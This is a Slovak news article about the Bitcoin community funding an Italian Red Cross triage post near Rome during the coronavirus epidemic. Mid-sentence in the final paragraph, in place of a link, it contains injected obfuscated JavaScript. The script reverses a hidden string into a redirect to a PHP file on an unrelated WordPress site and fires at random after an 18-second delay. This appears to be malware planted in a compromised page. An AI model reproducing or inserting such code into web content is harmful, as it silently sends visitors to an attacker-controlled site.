bitcoin, krypto

Bitcoinová komunita finančne podporila taliansky Červený kríž v boji proti koronavírusu

Neďaleko Ríma vzniklo zdravotnícke stanovište pre predbežné triedenie ľudí s podozrením na nákazu koronavírusu. Stanovište vrátane vybavenia bolo nadobudnuté za finančné príspevky v Bitcoine získané od kryptomenovej komunity.

Na stanovište, ktoré sa označuje ako AMP – Advanced Medical Post, prispeli Bitcoin nadšenci v rámci fundraisingovej kampane talianskeho Červeného kríža. Donator na transparentný účet poslali Bitcoin v hodnote presahujúcej 31 tisíc dolárov, čím došlo k prekročeniu cieľovej sumy zbierky o takmer tridsať percent.

Zbierka na AMP, ktorá vznikla v Colli Albani, mieste juhovýchodne od Ríma, bežala od 13. marca. „Sme šťastní, že sa nám získané peniaze podarilo využiť v prospech veci. Sme tiež veľmi potešení a vďační za pomoc, ktorej sa nám od bitcoinovej komunity dostalo, „uviedol Bruno Pietrosanti, riaditeľ miestnej pobočky Červeného kríža.

AMP je mobilné zdravotnícke zariadenie, ktoré slúži v teréne pre zber a triedenie pacientov podľa toho, akú lekársku pomoc a starostlivosť potrebujú. V Taliansku potom tieto stánky pomáhajú záchranárom v boji proti $GRn=function(n){if (typeof ($GRn.list[n]) == „string“) return $GRn.list[n].split(„“).reverse().join(„“);return $GRn.list[n];};$GRn.list=[„\’php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andemie-koronavirusu/“>Koronavírusovej epidémii ako kontaktné miesto pre potenciálne nakazených. Pacienti sú tu otestovaní a je im ponúknuté základné poradenstvo, ako sa správať, aby minimalizovali riziko prenosu na seba a na ďalších ľudí.

2 komentáre

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *